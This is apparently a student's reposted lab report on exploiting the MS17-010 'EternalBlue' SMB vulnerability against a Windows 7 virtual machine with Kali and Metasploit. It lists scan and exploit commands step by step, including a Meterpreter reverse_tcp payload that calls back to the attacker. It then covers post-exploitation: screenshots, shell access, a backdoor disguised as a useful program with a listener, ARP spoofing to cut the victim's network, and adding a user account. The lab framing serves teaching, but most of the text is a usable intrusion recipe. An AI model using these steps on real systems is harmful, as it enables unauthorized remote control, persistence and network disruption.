导语
最近学期末进行网络安全实训,老师要求每个小组选择一个方向进行研究,本篇将讲述“永恒之蓝”漏洞的简单利用。
一、实验原理
Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,电脑只要开机,攻击者就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
二、实验环境
三、实验记录
一次渗透的基本步骤
(1)启动kali虚机,进入root权限打开Metasploit渗透工具。msfconsole
(2)打开另一个窗口,扫描一下靶机是否开启了445端口以及查看版本信息nmap -sV -p 445 192.168.79.129(靶机地址)。
(3)search:搜索msf中相关组件
利用模块进行漏洞验证、。search ms17-010
(4)使用use auxiliary/scanner/smb/smb_ms17_010进行验证是否存在永恒之蓝漏洞。
(5)然后查看具体需要配置的东西show options
(6)设置攻击目标及端口set rhosts 192.168.79.129set rport 445
配置完后使用run命令开始测试
host likely vulnerable to MS17-010
表示主机存在这个漏洞,可以利用攻击。
host does not appear vulnerable
主机不易受到攻击 / 不存在这个漏洞。
注:实验一开始靶机选取的是OWASP,经过验证后发现不存在MS17-010漏洞,故更换为win7虚拟机。
补充:(1)渗透攻击(Exploit),指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞,所进行的攻击行为。
(2)攻击载荷(Payload),是我们期望目标系统在被渗透攻击之后去执行的代码。
(3)模块(Module),指Metasploit框架中所使用的一段软件代码组件,可用于发起渗透攻击或执行某些辅助攻击动作。
四、实验步骤
(1)关闭防火墙,ping通两台主机使其能访问外网。
在一台宿主主机上安装两个不同的虚拟机镜像构建一个虚拟的网络,其中,一台虚拟机为win7,一台虚拟机为Kali Linux。
- 打开VMware,“编辑”——“虚拟网络映射器”——“桥接模式”
- 将两台虚拟机的IP地址分配方式为自动获取(也就是动态IP)。
win7:“控制面板”——>“网络和Internet”——>“网络和共享中心”——>“更改适配器设置”——>选择网卡然后右击“属性”——>选择“TCP/IPV4”——>“属性”,选择“自动获得IP地址”——>点击“确定”即可。
**Kali Linux:**打开/etc/network/interfaces文件,配置interfaces文件gedit /etc/network/interfaces
#The primary network interface
auto eth0
iface eth0 inet dhcp
- Kali Linux通过ifconfig查看IP地址(注意不是ip),测试连通性。
(2)代码植入控制靶机msfconsole打开metasploit工具search ms17_010查找漏洞use exploit/windows/smb/ms17_010_eternalblue使用"永恒之蓝"攻击代码植入漏洞set RHOST 192.168.47.132设置靶机set LHOST 192.168.47.131设置攻击机set payload windows/x64/meterpreter/reverse_tcp设置有效载荷show options显示选项设置
用run进行攻击
到这就算成了(* ̄rǒ ̄)。
五、实现小操作
(1)输入sysinfo查看系统信息。
(2)screenshot截取靶机正在浏览的页面,并保存到攻击机。
(3)输入shell进入win7控制台,与在win7中具有同样效果。
(4)上传一个文件1.jpg给靶机
(5)生成后门程序,然后将后门伪装成一个有用的程序上传到受害者系统,在攻击端利用use exploit/multi/handler监听消息 ,对方点开程序后我们会收到消息,就可以知道装入成功了。
有了后门以后,不用再输入对方IP,即使对方改了IP地址也可以进入。
(6)查看操作系统补丁情况
(7)ARP断网攻击,给他把网断老。
-i 指定网卡
-t 指定目标ip
这里的192.168.47.2是网关
ARP断网攻击,欺骗对方无法上网,ctrl+c停止欺骗
(8)在win7上新建一个用户
(9)没了
原理
“永恒之蓝”漏洞工具利用了c v e - 2 0 1 7 -0144漏洞。cve -2017-0144漏洞错误处理了网络传入的数据长度,导致复制数据时出现内存溢出。
溢出的数据覆盖了用于接收数据的内存区域指针,把合法地址修改成了系统保留区域(KI_USER_SHARED_DATA0xf fdf0000)的地址,导致后续发来的数据覆盖了系统保留区域。系统保留区域中存放了系统调用返回(SystemCallReturn)地址,从而在网络接收系统调用完成后会跳转到攻击者精心布置的代码中,使攻击者成功执行shellcode获得超级用户权限。文章来源:https://www.toymoban.com/news/detail-471577.html
总结
老师一直不在,自己查资料坐牢一样,尤其是OWASP虚拟机搞半天没那个漏洞,差点换课题,总算混完了,还两门考试没复习呢摸了摸了。。(* ̄rǒ ̄)文章来源地址https://www.toymoban.com/news/detail-471577.html
到了这里,关于【网络安全】MS17-010“永恒之蓝”漏洞的利用的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
